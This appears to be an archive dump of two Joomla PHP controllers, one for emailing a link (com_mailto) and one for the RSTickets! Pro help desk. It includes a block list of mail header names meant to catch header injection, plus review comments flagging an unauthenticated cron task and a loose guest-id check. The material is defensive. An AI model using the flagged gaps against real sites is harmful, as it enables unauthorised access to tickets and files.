home/lmsyaran/public_html/joomla3/components/com_mailto/controller.php000064400000007432151171424540022406
0ustar00<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_mailto
 *
 * @copyright   (C) 2006 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

// Joomla direct-access guard: _JEXEC is only defined when the framework bootstraps this file.
defined('_JEXEC') or die;

/**
 * Mailer Component Controller.
 *
 * @since  1.5
 */
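class MailtoController extends JControllerLegacy
{
	/**
	 * Show the form so that the user can send the link to someone.
	 *
	 * @return  void
	 *
	 * @since   1.5
	 */
	public function mailto()
	{
		$this->input->set('view', 'mailto');
		$this->display();
	}

	/**
	 * Send the message and display a notice.
	 *
	 * Flow: CSRF token check, form validation, a scan of the posted values
	 * for smuggled mail headers, a check that the shared link is internal,
	 * sender / recipient address checks, then the mail is built, cleaned and
	 * sent. Every failure path re-displays the form via mailto().
	 *
	 * @return  mixed  void on success; false or the result of mailto() on failure.
	 *
	 * @since   1.5
	 */
	public function send()
	{
		// Check for request forgeries
		$this->checkToken();

		$app   = JFactory::getApplication();
		$model = $this->getModel('mailto');
		$data  = $model->getData();

		// Validate the posted data.
		$form = $model->getForm();

		if (!$form)
		{
			JError::raiseError(500, $model->getError());

			return false;
		}

		if (!$model->validate($form, $data))
		{
			foreach ($model->getErrors() as $error)
			{
				// Errors may be plain strings or Exception objects.
				$errorMessage = ($error instanceof Exception) ? $error->getMessage() : $error;

				$app->enqueueMessage($errorMessage, 'error');
			}

			return $this->mailto();
		}

		// Refuse the request outright if any posted value carries a mail header.
		if ($this->containsMailHeader($data))
		{
			JError::raiseError(403, '');

			return false;
		}

		$siteName = $app->get('sitename');
		$link     = MailtoHelper::validateHash($this->input->post->get('link', '', 'post'));

		// Verify that this is a local link
		if (!$link || !JUri::isInternal($link))
		{
			// Non-local url...
			JError::raiseNotice(500, JText::_('COM_MAILTO_EMAIL_NOT_SENT'));

			return $this->mailto();
		}

		$subject_default = JText::sprintf('COM_MAILTO_SENT_BY', $data['sender']);
		$subject         = (isset($data['subject']) && $data['subject'] !== '') ? $data['subject'] : $subject_default;

		// Check for valid to and from addresses; both are reported before bailing out.
		$error = false;

		foreach (array('emailto', 'emailfrom') as $field)
		{
			// empty() avoids a notice when the field is absent from $data.
			if (empty($data[$field]) || !JMailHelper::isEmailAddress($data[$field]))
			{
				$error = JText::sprintf('COM_MAILTO_EMAIL_INVALID', isset($data[$field]) ? $data[$field] : '');

				JError::raiseWarning(0, $error);
			}
		}

		if ($error)
		{
			return $this->mailto();
		}

		// Build the message to send
		$msg  = JText::_('COM_MAILTO_EMAIL_MSG');
		$body = sprintf($msg, $siteName, $data['sender'], $data['emailfrom'], $link);

		// Clean the email data
		$subject = JMailHelper::cleanSubject($subject);
		$body    = JMailHelper::cleanBody($body);

		// To send we need to use punycode.
		$data['emailfrom'] = JStringPunycode::emailToPunycode($data['emailfrom']);
		$data['emailfrom'] = JMailHelper::cleanAddress($data['emailfrom']);
		$data['emailto']   = JStringPunycode::emailToPunycode($data['emailto']);

		// Send the email
		$sent = JFactory::getMailer()->sendMail($data['emailfrom'], $data['sender'], $data['emailto'], $subject, $body);

		if ($sent !== true)
		{
			JError::raiseNotice(500, JText::_('COM_MAILTO_EMAIL_NOT_SENT'));

			return $this->mailto();
		}

		$this->input->set('view', 'sent');
		$this->display();
	}

	/**
	 * Check the posted values for email header fragments.
	 *
	 * Header field names are case-insensitive, so the match uses stripos();
	 * a case-sensitive strpos() would let "Bcc:" or "CC:" through. Only
	 * string values are inspected, as before. This is a coarse heuristic:
	 * the JMailHelper::clean* calls in send() are the layer that normalises
	 * the values actually placed in the mail — TODO confirm they strip CR/LF.
	 *
	 * @param   array  $data  The posted form data, keyed by field name.
	 *
	 * @return  boolean  True if any value contains a forbidden header name.
	 *
	 * @since   __DEPLOY_VERSION__
	 */
	protected function containsMailHeader($data)
	{
		// An array of email headers we do not want to allow as input
		$headers = array(
			'Content-Type:',
			'MIME-Version:',
			'Content-Transfer-Encoding:',
			'bcc:',
			'cc:',
		);

		foreach ((array) $data as $value)
		{
			if (!is_string($value))
			{
				continue;
			}

			foreach ($headers as $header)
			{
				if (stripos($value, $header) !== false)
				{
					return true;
				}
			}
		}

		return false;
	}
}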
home/lmsyaran/public_html/j3/components/com_rsticketspro/controller.php000064400000012372151176044250022625
0ustar00<?php
/**
 * @package    RSTickets! Pro
 *
 * @copyright  (c) 2010 - 2016 RSJoomla!
 * @link       https://www.rsjoomla.com
 * @license    GNU General Public License http://www.gnu.org/licenses/gpl-3.0.en.html
 */

// Joomla direct-access guard: _JEXEC is only defined when the framework bootstraps this file.
defined('_JEXEC') or die('Restricted access');

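class RsticketsproController extends JControllerLegacy
{
	/**
	 * Render the CAPTCHA image and terminate the request.
	 *
	 * Output is only produced when the "captcha_enabled" config value is 1;
	 * in every case the application is closed so nothing else is rendered.
	 *
	 * @return void
	 */
	public function captcha()
	{
		$app = JFactory::getApplication();

		if (RSTicketsProHelper::getConfig('captcha_enabled') == 1)
		{
			require_once JPATH_ADMINISTRATOR . '/components/com_rsticketspro/helpers/captcha/captcha.php';

			$captcha = new RsticketsproCaptcha;
			$captcha->setLength(RSTicketsProHelper::getConfig('captcha_characters'));

			// Drop anything already buffered so it does not precede the image bytes.
			ob_end_clean();

			$captcha->getImage();

			$app->setHeader('content-type', 'image/jpeg');
			$app->sendHeaders();
		}

		$app->close();
	}

	/**
	 * Clear the stored ticket search filters and return to the tickets list.
	 *
	 * @return void
	 */
	public function resetsearch()
	{
		$ticketsModel = $this->getModel('tickets');
		$ticketsModel->resetSearch();

		$this->setRedirect(RSTicketsProHelper::route('index.php?option=com_rsticketspro&view=tickets', false));
	}

	/**
	 * Run the component's cron helper for job types 1 and 2, if the helper exists.
	 *
	 * NOTE(review): this task performs no token or access check, so it can be
	 * triggered by any request that reaches the controller — confirm that the
	 * cron helper is designed to be safely re-runnable by arbitrary visitors.
	 *
	 * @return void
	 */
	public function cron()
	{
		$cronHelper = JPATH_ADMINISTRATOR . '/components/com_rsticketspro/helpers/cron.php';

		if (!file_exists($cronHelper))
		{
			return;
		}

		require_once $cronHelper;

		// Meaning of the type ids is defined by RSTicketsProCron, not visible here.
		$cron = new RSTicketsProCron(array(1, 2));
		$cron->parse();
	}

	/**
	 * Stream a ticket attachment to the browser.
	 *
	 * Reads "cid" (ticket id) and "filename" from the request, checks that the
	 * current user may see the ticket, looks the attachment up by ticket id and
	 * filename, and sends the stored file with no-cache headers. Any failure is
	 * reported as a warning and redirects to the tickets view.
	 *
	 * @return void
	 */
	public function viewinline()
	{
		// Resolved before the try block so the catch handler can always use it.
		$app = JFactory::getApplication();

		try
		{
			$db          = JFactory::getDbo();
			$query       = $db->getQuery(true);
			$user        = JFactory::getUser();
			$filename    = $app->input->getString('filename', '');
			$ticket_id   = $app->input->getInt('cid', 0);
			$is_staff    = RSTicketsProHelper::isStaff();
			$permissions = RSTicketsProHelper::getCurrentPermissions();
			$departments = RSTicketsProHelper::getCurrentDepartments();

			// Request values only ever reach SQL through $db->q().
			$query->select($db->qn('customer_id'))
				->select($db->qn('department_id'))
				->select($db->qn('staff_id'))
				->from($db->qn('#__rsticketspro_tickets'))
				->where($db->qn('id') . ' = ' . $db->q($ticket_id));

			$ticket = $db->setQuery($query)->loadObject();

			if (!$ticket)
			{
				throw new Exception(JText::_('RST_CUSTOMER_CANNOT_VIEW_TICKET'));
			}

			$this->assertCanViewTicket($ticket, $user, $is_staff, $permissions, $departments);

			$query->clear()
				->select('*')
				->from($db->qn('#__rsticketspro_ticket_files'))
				->where($db->qn('ticket_id') . ' = ' . $db->q($ticket_id))
				->where($db->qn('filename') . ' = ' . $db->q($filename));

			$file = $db->setQuery($query)->loadObject();

			if (empty($file))
			{
				throw new Exception(JText::_('RST_CANNOT_DOWNLOAD_FILE'));
			}

			// The on-disk name is a hash of row ids, never the user-supplied filename.
			$path = RST_UPLOAD_FOLDER . '/' . md5($file->id . ' ' . $file->ticket_message_id);

			if (!file_exists($path))
			{
				throw new Exception(JText::_('RST_CANNOT_DOWNLOAD_FILE_NOT_EXIST'));
			}

			$this->sendAttachmentHeaders($file, $path);

			readfile($path);

			$app->close();
		}
		catch (Exception $e)
		{
			$app->enqueueMessage($e->getMessage(), 'warning');
			$app->redirect(RSTicketsProHelper::route('index.php?option=com_rsticketspro&view=tickets', false));
		}
	}

	/**
	 * Throw unless the current user may view the given ticket.
	 *
	 * Customers may only see their own tickets. Staff are additionally limited
	 * by department membership, the "staff_force_departments" setting and the
	 * see_unassigned_tickets / see_other_tickets permissions.
	 *
	 * @param object  $ticket      Row with customer_id, department_id and staff_id.
	 * @param object  $user        The current user (JFactory::getUser()).
	 * @param boolean $isStaff     Whether the current user is staff.
	 * @param object  $permissions Current staff permissions object.
	 * @param array   $departments Department ids the current staff member belongs to.
	 *
	 * @return void
	 *
	 * @throws Exception When the user is not allowed to view the ticket.
	 */
	protected function assertCanViewTicket($ticket, $user, $isStaff, $permissions, $departments)
	{
		$userId  = $user->get('id');
		$isOwner = ($ticket->customer_id == $userId);

		// Kept loose on purpose: department_id comes back from the DB as a
		// string while $departments may hold ints — confirm before tightening.
		$inDepartment = in_array($ticket->department_id, $departments);

		// NOTE(review): the loose == above means a guest (id 0) matches a
		// ticket whose customer_id is 0 — confirm that is intended.
		if (!$isStaff && !$isOwner)
		{
			throw new Exception(JText::_('RST_CUSTOMER_CANNOT_VIEW_TICKET'));
		}

		if (!$isStaff)
		{
			return;
		}

		// Staff who are not the customer must belong to the ticket's department.
		if (!$isOwner && !$inDepartment)
		{
			throw new Exception(JText::_('RST_STAFF_CANNOT_VIEW_TICKET'));
		}

		// With staff_force_departments set, membership is required even for the owner.
		if (RSTicketsProHelper::getConfig('staff_force_departments') && !$inDepartment)
		{
			throw new Exception(JText::_('RST_STAFF_CANNOT_VIEW_TICKET'));
		}

		if (!$permissions->see_unassigned_tickets && $ticket->staff_id == 0)
		{
			throw new Exception(JText::_('RST_STAFF_CANNOT_VIEW_TICKET'));
		}

		if (!$permissions->see_other_tickets && $ticket->staff_id > 0 && $ticket->staff_id != $userId)
		{
			throw new Exception(JText::_('RST_STAFF_CANNOT_VIEW_TICKET'));
		}
	}

	/**
	 * Emit the response headers for an attachment served by viewinline().
	 *
	 * Only jpg/jpeg/gif/png are sent with an image/* type. Everything else is
	 * sent as application/octet-stream plus X-Content-Type-Options: nosniff.
	 * Previously no Content-Type was set for non-images, so PHP's
	 * default_mimetype (normally text/html) applied and an uploaded HTML or
	 * SVG attachment would have been rendered in the site's origin.
	 *
	 * Of the repeated Cache-Control / Expires headers the original sent, only
	 * the last of each survives because header() replaces by default; only
	 * those are kept here.
	 *
	 * @param object $file The #__rsticketspro_ticket_files row (uses ->filename).
	 * @param string $path Absolute path of the stored file, used for Content-Length.
	 *
	 * @return void
	 */
	protected function sendAttachmentHeaders($file, $path)
	{
		$extension = strtolower(JFile::getExt($file->filename));
		$images    = array('jpg', 'jpeg', 'gif', 'png');

		if (in_array($extension, $images, true))
		{
			$contentType = 'image/' . ($extension === 'jpg' ? 'jpeg' : $extension);
		}
		else
		{
			$contentType = 'application/octet-stream';
		}

		// Strip characters that would terminate or break the quoted filename.
		$safeName = str_replace(array('"', "\r", "\n"), '', $file->filename);

		if (ob_get_level() > 0)
		{
			ob_end_clean();
		}

		header('Content-Type: ' . $contentType);
		header('X-Content-Type-Options: nosniff');
		header('Cache-Control: no-cache');
		header('Pragma: no-cache');
		header('Content-Description: File Transfer');
		header('Expires: Sat, 01 Jan 2000 01:00:00 GMT');
		header('Content-Length: ' . (string) filesize($path));
		header('Content-Disposition: inline; filename="' . $safeName . '"');
		header('Content-Transfer-Encoding: binary');
	}

	/**
	 * Dispatch to a view, falling back to "tickets" on the site client when the
	 * requested view has no folder under ./views.
	 *
	 * @param boolean $cachable  Passed through to JControllerLegacy::display().
	 * @param array   $urlparams Passed through to JControllerLegacy::display().
	 *
	 * @return mixed Whatever the parent display() returns.
	 */
	public function display($cachable = false, $urlparams = array())
	{
		$app = JFactory::getApplication();

		if ($app->isClient('site'))
		{
			$requested = $app->input->getCmd('view', '');
			$allowed   = JFolder::folders(__DIR__ . '/views');

			// getCmd() and folders() both yield strings, so a strict compare is safe.
			if (!in_array($requested, $allowed, true))
			{
				$app->input->set('view', 'tickets');
			}
		}

		return parent::display($cachable, $urlparams);
	}
}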